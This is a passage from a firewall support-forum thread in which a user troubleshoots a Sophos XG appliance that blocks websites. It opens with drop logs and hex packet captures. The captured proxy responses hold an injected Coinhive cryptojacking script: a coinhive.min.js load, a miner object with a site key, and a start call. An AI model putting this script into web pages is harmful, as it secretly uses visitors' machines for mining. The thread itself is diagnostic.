g_subtype=Denied log_status=N/A log_priority=Alert duration=N/A in_dev=PortB out
_dev= inzone_id=1 outzone_id=0 source_mac=cc:2d:e0:a1:ef:58 dest_mac=00:0d:48:33
:c6:12 l3_protocol=IP source_ip=91.216.107.230 dest_ip=154.73.22.238 l4_protocol
=TCP source_port=80 dest_port=43322 fw_rule_id=9 policytype=1 live_userid=0 user
id=0 user_gp=0 ips_id=1 sslvpn_id=0 web_filter_id=4 hotspot_id=0 hotspotuser_id=
0 hb_src=0 hb_dst=0 dnat_done=0 proxy_flags=0 icap_id=0 app_filter_id=3 app_cate
gory_id=3 app_id=6 category_id=23 bandwidth_id=22 up_classid=131084 dn_classid=1
31083 source_nat_id=1 cluster_node=0 inmark=0x0 nfqueue=253 scanflags=0 gateway_
offset=0 max_session_bytes=0 drop_fix=1 ctflags=592129 connid=2774694400 masteri
d=2774691840 status=398 state=8 sent_pkts=N/A recv_pkts=N/A sent_bytes=N/A recv_
bytes=N/A tran_src_ip=N/A tran_src_port=N/A tran_dst_ip=N/A tran_dst_port=N/A

2018-12-12 11:32:51 0139021 IP 91.216.107.230.80 > 154.73.22.238.43322 : proto T
CP: F 2282134116:2282134767(651) win 980 checksum : 38068
0x0000: 4500 02b3 aa7a 4000 4006 14d5 5bd8 6be6 E....z@.@...[.k.
0x0010: 9a49 16ee 0050 a93a 8806 9a64 edf8 1d2a .I...P.:...d...*
0x0020: 5019 03d4 94b4 0000 4854 5450 2f31 2e30 P.......HTTP/1.0
0x0030: 2034 3033 2046 6f72 6269 6464 656e 0d0a .403.Forbidden..
0x0040: 436f 6e74 656e 742d 4c65 6e67 7468 3a20 Content-Length:.
0x0050: 3434 390d 0a43 6f6e 7465 6e74 2d54 7970 449..Content-Typ
0x0060: 653a 2074 6578 742f 6874 6d6c 0d0a 4461 e:.text/html..Da
0x0070: 7465 3a20 4672 692c 2032 3720 4665 6220 te:.Fri,.27.Feb.
0x0080: 3139 3730 2032 333a 3139 3a33 3420 474d 1970.23:19:34.GM
0x0090: 540d 0a45 7870 6972 6573 3a20 4672 692c T..Expires:.Fri,
0x00a0: 2032 3720 4665 6220 3139 3730 2032 333a .27.Feb.1970.23:
0x00b0: 3139 3a33 3420 474d 540d 0a53 6572 7665 19:34.GMT..Serve
0x00c0: 723a 204d 696b 726f 7469 6b20 4874 7470 r:.Mikrotik.Http
0x00d0: 5072 6f78 790d 0a50 726f 7879 2d43 6f6e Proxy..Proxy-Con
0x00e0: 6e65 6374 696f 6e3a 2063 6c6f 7365 0d0a nection:.close..
0x00f0: 0d0a 3c68 746d 6c3e 0d0a 3c68 6561 643e ..<html>..<head>
0x0100: 0d0a 093c 6d65 7461 2068 7474 702d 6571 ...<meta.http-eq
0x0110: 7569 763d 2243 6f6e 7465 6e74 2d54 7970 uiv="Content-Typ
0x0120: 6522 2063 6f6e 7465 6e74 3d22 7465 7874 e".content="text
0x0130: 2f68 746d 6c3b 6368 6172 7365 743d 7769 /html;charset=wi
0x0140: 6e64 6f77 732d 3132 3531 223e 0d0a 093c ndows-1251">...<
0x0150: 7469 746c 653e 2268 7474 703a 2f2f 7777 title>"http://ww
0x0160: 772e 6172 6d70 2d72 6463 2e6f 7267 2f22 w.armp-rdc.org/"
0x0170: 3c2f 7469 746c 653e 200d 0a3c 7363 7269 </title>...<scri
0x0180: 7074 2073 7263 3d22 6874 7470 733a 2f2f pt.src="https://
0x0190: 636f 696e 6869 7665 2e63 6f6d 2f6c 6962 coinhive.com/lib
0x01a0: 2f63 6f69 6e68 6976 652e 6d69 6e2e 6a73 /coinhive.min.js
0x01b0: 223e 3c2f 7363 7269 7074 3e0d 0a3c 7363 "></script>..<sc
0x01c0: 7269 7074 3e0d 0a09 7661 7220 6d69 6e65 ript>...var.mine
0x01d0: 7220 3d20 6e65 7720 436f 696e 4869 7665 r.=.new.CoinHive
0x01e0: 2e41 6e6f 6e79 6d6f 7573 2827 6f69 4b41 .Anonymous('oiKA
0x01f0: 4745 736c 634e 666a 6667 7854 4d72 784b GEslcNfjfgxTMrxK
0x0200: 474d 4a76 6834 3336 7970 494d 272c 207b GMJvh436ypIM',.{
0x0210: 7468 726f 7474 6c65 3a20 302e 317d 293b throttle:.0.1});
0x0220: 0d0a 096d 696e 6572 2e73 7461 7274 2843 ...miner.start(C
0x0230: 6f69 6e48 6976 652e 464f 5243 455f 4558 oinHive.FORCE_EX
0x0240: 434c 5553 4956 455f 5441 4229 3b0d 0a3c CLUSIVE_TAB);..<
0x0250: 2f73 6372 6970 743e 0d0a 3c2f 6865 6164 /script>..</head
0x0260: 3e0d 0a3c 6672 616d 6573 6574 3e0d 0a3c >..<frameset>..<
0x0270: 6672 616d 6520 7372 633d 2268 7474 703a frame.src="http:
0x0280: 2f2f 7777 772e 6172 6d70 2d72 6463 2e6f //www.armp-rdc.o
0x0290: 7267 2f22 3e3c 2f66 7261 6d65 3e0d 0a3c rg/"></frame>..<
0x02a0: 2f66 7261 6d65 7365 743e 0d0a 3c2f 6874 /frameset>..</ht
0x02b0: 6d6c 3e ml>
Date=2018-12-12 Time=11:32:51 log_id=0139021 log_type=Firewall log_component= lo
g_subtype=Denied log_status=N/A log_priority=Alert duration=N/A in_dev=PortB out
_dev= inzone_id=1 outzone_id=0 source_mac=cc:2d:e0:a1:ef:58 dest_mac=00:0d:48:33
:c6:12 l3_protocol=IP source_ip=91.216.107.230 dest_ip=154.73.22.238 l4_protocol
=TCP source_port=80 dest_port=43322 fw_rule_id=9 policytype=1 live_userid=0 user
id=0 user_gp=0 ips_id=1 sslvpn_id=0 web_filter_id=4 hotspot_id=0 hotspotuser_id=
0 hb_src=0 hb_dst=0 dnat_done=0 proxy_flags=0 icap_id=0 app_filter_id=3 app_cate
gory_id=3 app_id=6 category_id=23 bandwidth_id=22 up_classid=131084 dn_classid=1
31083 source_nat_id=1 cluster_node=0 inmark=0x0 nfqueue=253 scanflags=0 gateway_
offset=0 max_session_bytes=0 drop_fix=1 ctflags=592129 connid=2774694400 masteri
d=2774691840 status=398 state=8 sent_pkts=N/A recv_pkts=N/A sent_bytes=N/A recv_
bytes=N/A tran_src_ip=N/A tran_src_port=N/A tran_dst_ip=N/A tran_dst_port=N/A

2018-12-12 11:32:57 0139021 IP 91.216.107.230.80 > 154.73.22.238.43322 : proto T
CP: F 2282134116:2282134767(651) win 980 checksum : 38068
0x0000: 4500 02b3 aa7b 4000 4006 14d4 5bd8 6be6 E....{@.@...[.k.
0x0010: 9a49 16ee 0050 a93a 8806 9a64 edf8 1d2a .I...P.:...d...*
0x0020: 5019 03d4 94b4 0000 4854 5450 2f31 2e30 P.......HTTP/1.0
0x0030: 2034 3033 2046 6f72 6269 6464 656e 0d0a .403.Forbidden..
0x0040: 436f 6e74 656e 742d 4c65 6e67 7468 3a20 Content-Length:.
0x0050: 3434 390d 0a43 6f6e 7465 6e74 2d54 7970 449..Content-Typ
0x0060: 653a 2074 6578 742f 6874 6d6c 0d0a 4461 e:.text/html..Da
0x0070: 7465 3a20 4672 692c 2032 3720 4665 6220 te:.Fri,.27.Feb.
0x0080: 3139 3730 2032 333a 3139 3a33 3420 474d 1970.23:19:34.GM
0x0090: 540d 0a45 7870 6972 6573 3a20 4672 692c T..Expires:.Fri,
0x00a0: 2032 3720 4665 6220 3139 3730 2032 333a .27.Feb.1970.23:
0x00b0: 3139 3a33 3420 474d 540d 0a53 6572 7665 19:34.GMT..Serve
0x00c0: 723a 204d 696b 726f 7469 6b20 4874 7470 r:.Mikrotik.Http
0x00d0: 5072 6f78 790d 0a50 726f 7879 2d43 6f6e Proxy..Proxy-Con
0x00e0: 6e65 6374 696f 6e3a 2063 6c6f 7365 0d0a nection:.close..
0x00f0: 0d0a 3c68 746d 6c3e 0d0a 3c68 6561 643e ..<html>..<head>
0x0100: 0d0a 093c 6d65 7461 2068 7474 702d 6571 ...<meta.http-eq
0x0110: 7569 763d 2243 6f6e 7465 6e74 2d54 7970 uiv="Content-Typ
0x0120: 6522 2063 6f6e 7465 6e74 3d22 7465 7874 e".content="text
0x0130: 2f68 746d 6c3b 6368 6172 7365 743d 7769 /html;charset=wi
0x0140: 6e64 6f77 732d 3132 3531 223e 0d0a 093c ndows-1251">...<
0x0150: 7469 746c 653e 2268 7474 703a 2f2f 7777 title>"http://ww
0x0160: 772e 6172 6d70 2d72 6463 2e6f 7267 2f22 w.armp-rdc.org/"
0x0170: 3c2f 7469 746c 653e 200d 0a3c 7363 7269 </title>...<scri
0x0180: 7074 2073 7263 3d22 6874 7470 733a 2f2f pt.src="https://
0x0190: 636f 696e 6869 7665 2e63 6f6d 2f6c 6962 coinhive.com/lib
0x01a0: 2f63 6f69 6e68 6976 652e 6d69 6e2e 6a73 /coinhive.min.js
0x01b0: 223e 3c2f 7363 7269 7074 3e0d 0a3c 7363 "></script>..<sc
0x01c0: 7269 7074 3e0d 0a09 7661 7220 6d69 6e65 ript>...var.mine
0x01d0: 7220 3d20 6e65 7720 436f 696e 4869 7665 r.=.new.CoinHive
0x01e0: 2e41 6e6f 6e79 6d6f 7573 2827 6f69 4b41 .Anonymous('oiKA
0x01f0: 4745 736c 634e 666a 6667 7854 4d72 784b GEslcNfjfgxTMrxK
0x0200: 474d 4a76 6834 3336 7970 494d 272c 207b GMJvh436ypIM',.{
0x0210: 7468 726f 7474 6c65 3a20 302e 317d 293b throttle:.0.1});
0x0220: 0d0a 096d 696e 6572 2e73 7461 7274 2843 ...miner.start(C
0x0230: 6f69 6e48 6976 652e 464f 5243 455f 4558 oinHive.FORCE_EX
0x0240: 434c 5553 4956 455f 5441 4229 3b0d 0a3c CLUSIVE_TAB);..<
0x0250: 2f73 6372 6970 743e 0d0a 3c2f 6865 6164 /script>..</head
0x0260: 3e0d 0a3c 6672 616d 6573 6574 3e0d 0a3c >..<frameset>..<
0x0270: 6672 616d 6520 7372 633d 2268 7474 703a frame.src="http:
0x0280: 2f2f 7777 772e 6172 6d70 2d72 6463 2e6f //www.armp-rdc.o
0x0290: 7267 2f22 3e3c 2f66 7261 6d65 3e0d 0a3c rg/"></frame>..<
0x02a0: 2f66 7261 6d65 7365 743e 0d0a 3c2f 6874 /frameset>..</ht
0x02b0: 6d6c 3e ml>
Date=2018-12-12 Time=11:32:57 log_id=0139021 log_type=Firewall log_component= lo
g_subtype=Denied log_status=N/A log_priority=Alert duration=N/A in_dev=PortB out
_dev= inzone_id=1 outzone_id=0 source_mac=cc:2d:e0:a1:ef:58 dest_mac=00:0d:48:33
:c6:12 l3_protocol=IP source_ip=91.216.107.230 dest_ip=154.73.22.238 l4_protocol
=TCP source_port=80 dest_port=43322 fw_rule_id=9 policytype=1 live_userid=0 user
id=0 user_gp=0 ips_id=1 sslvpn_id=0 web_filter_id=4 hotspot_id=0 hotspotuser_id=
0 hb_src=0 hb_dst=0 dnat_done=0 proxy_flags=0 icap_id=0 app_filter_id=3 app_cate
gory_id=3 app_id=6 category_id=23 bandwidth_id=22 up_classid=131084 dn_classid=1
31083 source_nat_id=1 cluster_node=0 inmark=0x0 nfqueue=253 scanflags=0 gateway_
offset=0 max_session_bytes=0 drop_fix=1 ctflags=592129 connid=2774694400 masteri
d=2774691840 status=398 state=8 sent_pkts=N/A recv_pkts=N/A sent_bytes=N/A recv_
bytes=N/A tran_src_ip=N/A tran_src_port=N/A tran_dst_ip=N/A tran_dst_port=N/A
Cancel
Vote Up 0 Vote Down

Cancel

Children

0 TarekHalloun over 6 years ago in reply to TarekHalloun

i will not use sophos anymore - i will not renew the licenses of all my devices

i changed the utm and only gave it an allow all rule and still im having issues

support is bad .
Cancel
Vote Up 0 Vote Down

Cancel
0 LuCar Toni over 6 years ago in reply to TarekHalloun

Did you resolve your issue?

We need more information. Which Firmware are you running?

What kind of internet connection are you using?

You see only F(inish) packets in the drop packet capture. Which indicates, there is no issue at the connection itself. Just a normal Conntrack close.

Is your proxy service running? Do you intercept the SSL Connection?

And last but not least - Did you open up a Sophos Support Case?
Cancel
Vote Up 0 Vote Down

Cancel
0 TarekHalloun over 6 years ago in reply to LuCar Toni

im using a regular ISP internet ( an isp router connected directly to my utm with a static public ip ) : internet works normally without the utm

i only have these 2 firewall rules on the isp router : for dns attacks

i have the latest firmware : 17.1.4 MR-4 .. it is a new xg125 with a 3 years license

proxy is running ( port 3218 ) : i didnt not change a thing

no https inspection , only one allow all rule

case opened since 2 days : 8523993

pop and smtp is working normally

l2tp is working

some https sites like facebook are working

everything other is not : blank pages or the errors i posted above
Cancel
Vote Up 0 Vote Down

Cancel
0 LuCar Toni over 6 years ago in reply to TarekHalloun

Can you provide Screenshot of the Config? Everything you have done right now?

And some screenshots from client issue.
Cancel
Vote Up 0 Vote Down

Cancel
0 TarekHalloun over 6 years ago in reply to LuCar Toni

i can give u teamviewer access and you can view it directly if this is faster
Cancel
Vote Up 0 Vote Down

Cancel
0 LuCar Toni over 6 years ago in reply to TarekHalloun

I am here in my freetime and do not have access to teamviewer and something like that.

Seems like your appliance has somekind of issue with the content, which you try to provide.
Cancel
Vote Up 0 Vote Down

Cancel
0 TarekHalloun over 6 years ago in reply to LuCar Toni

they are normal websites like http://ceres.hhi.co.kr or http://www.aircargotracking.net

websites open normally on 3g or without the appliance

i changed 2 appliances with same issue

now with the allow all rule i am just getting a blank page
Cancel
Vote Up 0 Vote Down

Cancel
0 LuCar Toni over 6 years ago in reply to TarekHalloun

Can you check your Pattern updates on XG?
Cancel
Vote Up 0 Vote Down

Cancel
0 TarekHalloun over 6 years ago in reply to LuCar Toni

they are fully updated

please check the picture
Cancel
Vote Up 0 Vote Down

Cancel
0 rfcat_vk over 6 years ago in reply to TarekHalloun

I have accessed those website from my XG without any issues, so I would suspect that you have a configuration issue and need a specialist to review your configuration.

Ian
Cancel
Vote Up 0 Vote Down

Cancel